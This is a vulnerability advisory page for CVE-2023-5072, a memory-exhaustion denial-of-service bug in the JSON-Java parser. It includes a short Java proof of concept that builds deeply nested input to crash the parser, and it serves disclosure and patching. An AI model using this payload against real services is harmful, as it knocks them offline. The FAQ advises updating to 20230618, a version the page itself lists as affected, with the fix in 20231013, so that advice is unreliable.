CVE-2023-5072: DoS Vulnerability in JSON-Java

Published Oct 12, 2023
·
Updated

Duplicate Advisory This advisory has been withdrawn because it is a duplicate of GHSA-4jq9-2xhw-jpx7. This link is maintained to preserve external references.

Original Description Denial of Service in JSON-Java versions prior to 20230618.  A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.

Other sources

Summary A denial of service vulnerability in JSON-Java was discovered by ClusterFuzz. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used. There are two issues: (1) the parser bug can be used to circumvent a check that is supposed to prevent the key in a JSON object from itself being another JSON object; (2) if a key does end up being a JSON object then it gets converted into a string, using \ to escape special characters, including \ itself. So by nesting JSON objects, with a key that is a JSON object that has a key that is a JSON object, and so on, we can get an exponential number of \ characters in the escaped string.

Severity High - Because this is an already-fixed DoS vulnerability, the only remaining impact possible is for existing binaries that have not been updated yet.

Proof of Concept java package orgjsonbug;

import org.json.JSONObject;

/ Illustrates a bug in JSON-Java. / public class Bug { private static String makeNested(int depth) { if (depth == 0) { return "{\"a\":1}"; } return "{\"a\":1;\t\0" + makeNested(depth - 1) + ":1}"; }

public static void main(String[] args) { String input = makeNested(30); System.out.printf("Input string has length %d: %s\n", input.length(), input); JSONObject output = new JSONObject(input); System.out.printf("Output JSONObject has length %d: %s\n", output.toString().length(), output); } } When run, this reports that the input string has length 367. Then, after a long pause, the program crashes inside new JSONObject with OutOfMemoryError.

Further Analysis The issue is fixed by this PR.

Timeline Date reported: 07/14/2023 Date fixed: Date disclosed: 10/12/2023

Denial of Service in JSON-Java versions up to and including 20230618.  A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.

MITRE

Affected Software

5 affected componentsFixes available
maven/org.json:json<=20230618
20231013
Json-java Project Json-java<=20230618
stleary JSON-Java<=20230618
redhat/org.json<20231013
20231013
IBM watsonx.data intelligence<=5.2.0, 5.2.1, 5.3.0, 5.3.1

Event History

Oct 12, 2023
CVE Published
via MITRE·04:13 PM
Data Sourced
via MITRE·04:13 PM
DescriptionSeverityWeakness
Data Sourced
via NVD·05:15 PM
DescriptionSeverityWeaknessAffected Software
Advisory Published
via GitHub·06:30 PM
Oct 26, 2023
Data Sourced
via Red Hat·04:35 PM
DescriptionSeverityAffected Software
Nov 14, 2023
Withdrawn
via GitHub·10:24 PM
Apr 27, 2026
Data Sourced
via IBM·12:00 AM
DescriptionAffected Software

Parent advisories

This vulnerability appears in the following advisories.

Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is CVE-2023-5072?

CVE-2023-5072 is a vulnerability that allows for a Denial of Service attack in JSON-Java versions prior to 20230618.

2

What is the severity of CVE-2023-5072?

CVE-2023-5072 has a severity rating of high, with a CVSS score of 7.5.

3

How does CVE-2023-5072 work?

CVE-2023-5072 exploits a bug in the JSON-Java parser, allowing an input string of modest size to consume excessive amounts of memory, leading to a Denial of Service condition.

4

How can I fix CVE-2023-5072?

To fix CVE-2023-5072, it is recommended to update JSON-Java to version 20230618 or later.

5

Are there any references for CVE-2023-5072?

You can find more information about CVE-2023-5072 at the following references: [NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-5072), [GitHub Issue 758](https://github.com/stleary/JSON-java/issues/758), [GitHub Issue 771](https://github.com/stleary/JSON-java/issues/771).

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203